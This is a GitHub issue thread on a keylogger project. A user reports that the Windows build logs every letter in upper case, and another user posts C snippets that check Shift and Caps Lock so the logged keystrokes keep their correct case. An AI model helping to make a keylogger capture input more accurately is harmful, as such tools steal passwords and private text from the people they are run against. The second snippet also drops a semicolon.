### ISSUE TITLE
All letters are Upper case in windows version

### ISSUE THREAD

**Issue by Zedstron** [GiacomoLaw/Keylogger#51]
well its so strange  . its working fine just a small bug i think it stores all characters in upper case   form.
lower case letters are also converted to upper case.

**Comment by NtRaiseHardError** [comment]
I believe you have to check whether the key was pressed with capitalisation like so:
```c
// A-Z keys
if (vkCode >= 0x41 && vkCode <= 0x5A) {
	// Check if capitalised
	if (GetAsyncKeyState(VK_SHIFT) ^ ((GetKeyState(VK_CAPITAL) & 0x0001)) == FALSE)
		// Convert to lowercase
		vkCode += 32;
	// Log the key
}
```

For parsing other keys, please check [https://codereview.stackexchange.com/questions/46980/windows-keylogger-in-c](https://codereview.stackexchange.com/questions/46980/windows-keylogger-in-c).

**Comment by NtRaiseHardError** [comment]
Perhaps try using this instead:
```c
// A-Z
if (vkCode >= 0x41 && vkCode <= 0x5A) {
	// Check capitalisation
	if (GetAsyncKeyState(VK_SHIFT) ^ ((GetKeyState(VK_CAPITAL) & 0x0001)) == FALSE)
		// Convert to lowercase
		vkCode += 32
	// Log key
}
```

**Comment by Zedstron** [comment]
Thanks that solved my problem. .
